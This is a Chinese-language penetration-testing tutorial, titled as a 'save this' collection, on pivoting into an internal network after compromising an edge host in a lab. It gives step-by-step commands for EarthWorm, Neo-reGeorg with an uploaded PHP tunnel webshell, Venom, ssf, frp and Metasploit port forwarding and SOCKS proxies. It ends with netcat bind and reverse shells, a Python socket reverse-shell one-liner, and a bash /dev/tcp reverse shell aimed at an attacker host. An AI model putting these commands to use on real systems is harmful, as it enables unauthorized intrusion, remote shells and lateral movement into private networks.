内网穿透姿势汇总(建议收藏)

0x00 前言

在渗透中拿到一台边缘机器后剩余内网机器不出网的情况很常见,这时我们就需要把内网机器流量转到边缘机器上再进行访问,内网流量转出来的方法很多,在下面就介绍几种常见的方法

 

0x01 环境介绍

本地环境搭建:

边缘机器:

 

windows 7
ip:192.168.10.15(外)
 192.168.52.143(内)
目标机器:
windows 2008R2
ip:192.168.52.138
攻击机器:
windows 2008
ip:192.168.10.3
kali:
msf5:192.168.10.14
msf6:192.168.10.11

 

0x02 EarthWorm

将ew_for_windows上传到边缘机器

 

1.正向连接

适用于目标机器拥有一个外网ip

在win7机器上执行

ew -s ssocksd -l 888

 

监听本机888端口。然后在2008r2机器上使用proxifier进行连接

内网穿透姿势汇总(建议收藏)_第1张图片

 

内网穿透姿势汇总(建议收藏)_第2张图片

 

内网穿透姿势汇总(建议收藏)_第3张图片

 

内网穿透姿势汇总(建议收藏)_第4张图片

 

2.反向连接

适用于边缘机器无公网ip

攻击机器上执行

ew_for_Win.exe -s rcsocks -l 1080 -e 1234
 

内网穿透姿势汇总(建议收藏)_第5张图片

 

对外1234端口转发到1080端口

然后边缘机器连接

ew_for_Win.exe -s rssocks -d 192.168.10.3 -e 1234

内网穿透姿势汇总(建议收藏)_第6张图片

 

内网穿透姿势汇总(建议收藏)_第7张图片

 

内网穿透姿势汇总(建议收藏)_第8张图片

 

内网穿透姿势汇总(建议收藏)_第9张图片

 

内网穿透姿势汇总(建议收藏)_第10张图片

 

内网穿透姿势汇总(建议收藏)_第11张图片

 

0x03 Neo-reGeorg

注:这里需要python环境,在2008R2上弄总是出错,切到物理机进行实验,原理相同

生成文件

python neoreg.py generate -k 123456

内网穿透姿势汇总(建议收藏)_第12张图片

 

在neoreg_servers目录下生成了木马文件

内网穿透姿势汇总(建议收藏)_第13张图片

 

这里web机器解析php,所以我上传一个tunnel.php的马到web机器(win7)上

内网穿透姿势汇总(建议收藏)_第14张图片

 

攻击机连接

python neoreg.py -k 123456 -u http://192.168.10.15/tunnel.php
 

内网穿透姿势汇总(建议收藏)_第15张图片

 

内网穿透姿势汇总(建议收藏)_第16张图片

 

内网穿透姿势汇总(建议收藏)_第17张图片

 

0x04 Venom

攻击机器上执行

admin.exe -lport 9999

 

内网穿透姿势汇总(建议收藏)_第18张图片

 

边缘机器(win7)执行

agent.exe -rhost 192.168.10.3 -rport 9999

内网穿透姿势汇总(建议收藏)_第19张图片

 

攻击机查看反弹成功

内网穿透姿势汇总(建议收藏)_第20张图片

 

执行命令

goto 1
socks 6666

内网穿透姿势汇总(建议收藏)_第21张图片

 

内网穿透姿势汇总(建议收藏)_第22张图片

 

内网穿透姿势汇总(建议收藏)_第23张图片

 

内网穿透姿势汇总(建议收藏)_第24张图片

 

0x05 ssf

1.正向连接

把certs文件夹和ssfd上传到边缘机器

边缘机器开启1333端口

ssfd.exe ‐p 1333
 

内网穿透姿势汇总(建议收藏)_第25张图片

 

攻击机连接边缘机器的1333端口,并将数据转发给1222端口

ssfd.exe ‐D 1222 ‐p 1333 192.168.10.15

2008r2出问题,换到物理机上执行

内网穿透姿势汇总(建议收藏)_第26张图片

 

内网穿透姿势汇总(建议收藏)_第27张图片

 

内网穿透姿势汇总(建议收藏)_第28张图片

 

内网穿透姿势汇总(建议收藏)_第29张图片

 

2.反向连接

攻击机本地监听1234端口,命令如下:

ssfd.exe ‐p 1234

内网穿透姿势汇总(建议收藏)_第30张图片

 

边缘机器连接1234端口,并将数据转发到12345端口,命令如下:

ssf.exe ‐F 12345 ‐p 1234 192.168.10.3

此处没有实验成功,还是写下步骤

本地socks代理连接127.0.0.1 12345端口

内网穿透姿势汇总(建议收藏)_第31张图片

 

0x06 frp

攻击机设置frps.ini

[common]
bind_port = 6666

运行如下命令:

frps.exe -c frps.ini
 

内网穿透姿势汇总(建议收藏)_第32张图片

 

在边缘机器设置frpc.ini

[common]
server_addr = 192.168.10.3
server_port = 6666
[http_proxy]
type=tcp
remote_port=7777
plugin=socks5

执行如下命令:

frpc.exe ‐c frpc.ini

内网穿透姿势汇总(建议收藏)_第33张图片

 

监听本地7777端口

内网穿透姿势汇总(建议收藏)_第34张图片

 

内网穿透姿势汇总(建议收藏)_第35张图片

 

内网穿透姿势汇总(建议收藏)_第36张图片

 

0x07 msf

在msf6下只剩下了socks_proxy这个模块

内网穿透姿势汇总(建议收藏)_第37张图片

 

还是先修改proxychains4.conf这个配置文件

内网穿透姿势汇总(建议收藏)_第38张图片

 

添加路由使用模块

内网穿透姿势汇总(建议收藏)_第39张图片

 

这里注意一下,我们在运行之前先show options一下,发现默认是socks5

内网穿透姿势汇总(建议收藏)_第40张图片

 

代理运行如果想使用socks4a代理,添加如下语句即可

set version 4a

 

内网穿透姿势汇总(建议收藏)_第41张图片

 

修改浏览器配置

 

内网穿透姿势汇总(建议收藏)_第42张图片

 

成功访问内网资源

内网穿透姿势汇总(建议收藏)_第43张图片

 

拓展:portfwd端口转发

portfwd 是meterpreter提供的一种基本的端口转发。porfwd可以反弹单个端口到本地,并且监听,使用方法如下

portfwd add -l 3389 -r 192.168.52.138 -p 3389

然后我们访问本地3389

 

0x08 nc

1.正向连接

需要目标有公网ip

目标机器

nc -lvp 4444 -e /bin/sh linux
nc -lvp 4444 -e c:\windows\system32\cmd.exe windows

攻击机器

nc <目标机器ip> 4444

内网穿透姿势汇总(建议收藏)_第44张图片

 

内网穿透姿势汇总(建议收藏)_第45张图片

 

内网穿透姿势汇总(建议收藏)_第46张图片

 

2.反向连接

攻击机器监听本地1234端口

nc -lvp 1234

内网穿透姿势汇总(建议收藏)_第47张图片

 

目标机器执行

nc  1234 -e /bin/sh linux
nc  1234 -e cmd.exe windows

内网穿透姿势汇总(建议收藏)_第48张图片

 

内网穿透姿势汇总(建议收藏)_第49张图片

 

在一般情况下目标机器是没有nc的,这里可以用其他工具或者编程语言来代替nc

python反向shell

 

攻击机器:

nc -lvp 2222

目标机器:

python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.10.3',2222));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"

bash反向shell

攻击机器:

nc -lvp 2222

 

目标机器:


bash -i >& /dev/tcp/192.168.10.3/2222 0>&1

你可能感兴趣的:(nginx,linux,python,windows,java)